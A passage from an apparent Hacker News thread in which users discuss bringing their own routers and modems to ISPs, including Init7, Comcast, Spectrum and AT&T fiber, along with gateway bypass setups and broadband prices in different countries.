               | cater to techies. Of course support questions for random
               | devices need to be more specific than just "it doesn't
               | work".
               | pdonis wrote:
               | _> My ISP does_
               | Out of curiosity, which ISP do you have?
               | jmiserez wrote:
               | init7.net. They have a bunch of official guides, but also
               | help with other devices and have debugged issues with new
               | devices. Basically if your device is capable they want to
               | make it work.
               | thallian wrote:
               | Init7 is great, I only had to tick a checkbox saying
               | something like "I know what I am doing" and apart from
               | providing the technical information they left me alone.
               | Only had one problem with them that they resolved very
               | quickly (the fiber cable got damaged somewhere in the
               | basement).
               | kitteh wrote:
               | +1 to init7. They've gone above and beyond when I needed
               | them to change their routing policies to improve end to
               | end latency to a specific destination. Good luck getting
               | that from a major us carrier. And I wasn't even a
               | customer.
               | iagovar wrote:
               | The ISP I work for does, and it's a very large one (not
               | in the US). If a router is not ours, we check for sync or
               | if PPPoE is up. We tell the customer what's the result of
               | our tests and offer a technician if they are willing to
               | pay in case it's not our fault.
               | Most people are unwilling to pay, and yell at customer
               | service. Most of the times, specially when the router has
               | sync it's customer fault.
               | the8472 wrote:
               | > we check for sync or if PPPoE is up.
               | The problem with this kind of procedure is that it's only
               | a reasonable way to locate the problem when there are
               | problems at that very moment. You're getting stonewalled
               | when - during the day - you're reporting that it
               | frequently loses sync during the night.
             | CameronNemo wrote:
             | I work at an ISP of sorts. It is a regional research and
             | education network. We are owned by our members.
             | Heterogeneity is definitely par for the course, but that
             | does not stop us from trying to roll out some ubiquity
             | where we can. Many of our CPE routers are the same make and
             | model, and that makes maintenance and analysis much less
             | error prone. I.e. better service for our member
             | institutions.
             | If you want an ISP whose competitive advantage is dealing
             | with whatever crazy shit the edge throws at it, then that
             | is your prerogative. But having some ground rules and
             | baseline behavior makes it so that the ISP can focus on
             | more rewarding tasks, such as negotiating peerings,
             | establishing direct tunnels, improving network
             | observability, and predicting necessary backbone upgrades.
               | pdonis wrote:
               | _> having some ground rules and baseline behavior_
               | Doesn't "if you choose to use your own cable
               | modem/router, it must meet the DOCSIS 3 specification" do
               | this? That's the rule Comcast made me follow.
             | saber6 wrote:
             | To bolster your point: Honestly they don't need to do much
             | - the infrastructure is already there as a matter of being
             | able to turn people's service up/down/on/off.
             | There is always a provider-managed CPE device that
             | functions as the service demarcation point. This is the
             | point where your contracted service speed is enforced
             | (shape + egress queue and ingress policing).
             | You can have literally whatever router (dumb, smart, next-
             | gen, whatever) spewing bits at X rate. The CPE will
             | essentially normalize (police) that bit rate to your
             | contracted speed (upstream scenario).
             | pathseeker wrote:
             | >The Internet itself is "a zoo of endpoints on a shared
             | medium",
             | No, the shared medium in this case is referring the last
             | part of the cable network where everyone in a neighborhood
             | is transmitting effectively onto the same cable.
             | All it takes is a single device with a broken configuration
             | to spew crap onto the wrong channels, taking down the whole
             | neighborhood.
             | https://en.wikipedia.org/wiki/DOCSIS#Physical_layer
             | On the Internet it stops being a shared medium the minute
             | it gets out of the cable network into fiber/ethernet
             | switched+routed interconnections.
         | hiram112 wrote:
         | What's you cost and speed of the fiber?
         | Also, if you didn't need so much bandwidth, is it possible to
         | just order a basic 100Mb/10mb connection for a nominal fee of,
         | say, 30Euro?
         | The speeds in the US aren't actually that bad, but you're
         | basically forced to pay for everything: paid cable TV,
         | equipment rental fees, etc, and your $40 plan ends up creeping
         | towards $100 / month after the fees and taxes, with increases
         | every year.
           | ProZsolt wrote:
           | Don't know about NL, but in Hungary and a lot of other EU
           | countries you can get 100Mb/10Mb for about 10 EUR, gigabit
           | for 20-30.
           | thedance wrote:
           | This varies greatly by locale and is not uniform across the
           | USA. In Berkeley, California I have fiber service that
           | terminates in my own equipment, no rented equipment and no
           | bundled services (TV, phone, etc). It's nominally symmetric
           | gigabit service for $40/month.
           | hugofloss wrote:
           | For me, in NL, it's about 55 Euro per month for 200/200 fiber
           | and TV (including fees and taxes). Unfortunately this
           | increases every year in NL as well.
         | msla wrote:
         | I have Spectrum cable Internet. I use their modem, but I supply
         | my own router, and they've never given me any trouble. In fact,
         | they recently upgraded my modem (from a Scientific Atlanta
         | 2203C to a Ubee E31U2V1) and they didn't send me a router. The
         | Ubee E31U2V1, like the Scientific Atlanta 2203C before it, only
         | has one Ethernet port, and their official guide to getting the
         | new modem working involved rebooting an external router, so
         | there's no possible way they have a problem with customer-owned
         | routers.
         | Which works out great for me. I can use OpenWRT with no hassle.
         | More to the point, I see the cable stuff as "ISP land" in that
         | it's directly interfacing with their internal hardware, and so
         | has to dance to their tune very directly, whereas Ethernet and
         | TCP/IP are common, and so will obey my rules in my home. I
         | don't expect my modem to perform adblocking, which is why my
         | router does it, and I'm not going to be stupid and try to
         | "uncap" my modem to get more speed, so I don't see a point to
         | being able to provide my own cable modem. As long as I can own
         | the router which provides the only path in and out of my LAN, I
         | can do everything I'm capable of doing anyway, as far as I can
         | see.
           | pmh wrote:
           | > I don't see a point to being able to provide my own cable
           | modem
           | Other cable providers (e.g. Comcast) charge you a monthly fee
           | (~$5-15) to rent their modem. Buying a modem gets cost
           | effective pretty quickly.
             | AmericanChopper wrote:
             | I use my own one because the $2 Huawei ones perform really
             | poorly, they're the source of a large portion of general
             | internet performance issues for a lot of people.
         | markus92 wrote:
         | It's been more common for DSL too, but I haven't heard of
         | anyone using their own DOCSIS modem for Ziggo though. Have you?
         | r1ch wrote:
         | Do you know if this applies to cable modems too? Are they
         | required to allow a 3rd party modem that they normally wouldn't
         | provide to customers?
         | avip wrote:
         | This law is a tech-support nightmare.
         | You can call your ISP with _any_ arbitrary piece of non-branded
         | random AliExpress $#@$ of a network eq. and they must walk you
         | through configuring it? That does not make much sense to me.
         | hedora wrote:
         | The US has (had?) some network neutrality rules around
         | discriminating against different types of hardware, but AT&T
         | just does it anyway. (They require you to use their DSL modem +
         | router + wifi and it has broken support for adding a second
         | router behind it.)
           | strbean wrote:
           | Dealing with the same thing with AT&T fiber. There was word
           | of a hack involving putting your router behind a switch with
           | the AT&T router after cloning the MAC, then booting them both
           | up and letting your router pick up the DHCP responses along
           | with the AT&T router. Once the AT&T router had done its
           | proprietary handshake, you could disconnect the AT&T router.
           | Unfortunately I had no luck with that - my loose theory is
           | that my EdgeRouter was doing a ping check to see if the IP
           | was already taken before accepting the DHCP lease...
           | I was able to get "IP passthrough" mode working with the AT&T
           | router though. The key hiccup was that the AT&T router had to
           | be on a different subnet than my router's LAN subnet.
             | jonpurdy wrote:
             | I just moved to SF and got AT&T gigabit fiber in mid-
             | February. I followed this guide and got it working at
             | gigabit speeds (eventually): https://www.reddit.com/r/Ubiqu
             | iti/comments/cjw9jt/howto_bypa...
             | It's been working great since I set it up; highly
             | recommended!
             | Hardware offloading needs to be enabled and QoS disabled
             | for gigabit speeds (~900Mbps both ways, simultaneous
             | ~500Mbps both ways).
             | If you send me an email (hn-202003@jonpurdy.com), I can
             | send you my exact configs.
         | thinkloop wrote:
         | How can you do without the modem? Which ubiquity product is
         | that?
           | hugofloss wrote:
           | I used the Unifi Security Gateway to replace my ISP's modem.
           | philg_jr wrote:
           | Typically, FTTH doesn't require a "modem".
           | In my case, I have VZ Fios in the northeast US. Their
           | termination point at my house has an RJ45 Ethernet
           | connection. It goes directly to my pfSense router.
             | ksec wrote:
             | So they actually have an ONT somewhere and provides you
             | with a RJ45 Ethernet port only?
             | This is brilliant! Why aren't more ISP doing it? I dont
             | want another ONT / Modem / piece of equipment in my flat.
         | cameronh90 wrote:
         | As far as I'm aware, UK doesn't have a law like this, but I've
         | never had a situation where an ISP cared, they just tell you
         | that if you have problems they might not be able to help. I
         | think you get interop issues with TV and landline with those
         | ISPs where everything is bundled into one fibre, but the
         | internet bit usually works fine.
         | jedimastert wrote:
         | I don't know if it's "law" in America but I've never seen a
         | major ISP give any more guff than sometimes making a technician
         | come out to read the modem's MAC address. I've never had a
         | ISP's router or modem on my networks
           | robotnikman wrote:
           | Same. From my experience you can use a modem of your choice,
           | you just need to provide your MAC address to your ISP and its
           | good to go.
       | PascLeRasc wrote:
       | Slightly off-topic: I'd really like to run screenfetch on my
       | router (Asus RT-N66U), but it doesn't have enough free space to
       | sftp the script to it [1]. Piping the script just freezes up.
       | Does anyone know a good workaround? Has anyone ever tried this?
       | [1] https://unix.stackexchange.com/questions/510947/how-can-i-
       | ru...
         | Topgamer7 wrote:
         | Check if your router has tmpfs mounted. Iirc thats ram, it
         | should probably have enough space for you to upload it and run
         | it from there.
       | k__ wrote:
       | The only router with good admin interface I ever had was one with
       | open source software.
       | Every other router, for 20 years now, had a slow and buggy web
       | interface.
       | Why is this?!
       | skizm wrote:
       | My ISP has a cloud access "feature". If I go to it
       | redirects me to their "router.MYISP.net" site. What's the best
       | way to go about disabling this? Should I just dump the rented
       | router for my own?
         | simplyinfinity wrote:
         | asus (and others) have the same feature. In my case it's a
         | simple redirect from the ip of to router.myasus.com
         | which has a dns record of so all it does is do a
         | redirect to a domain.
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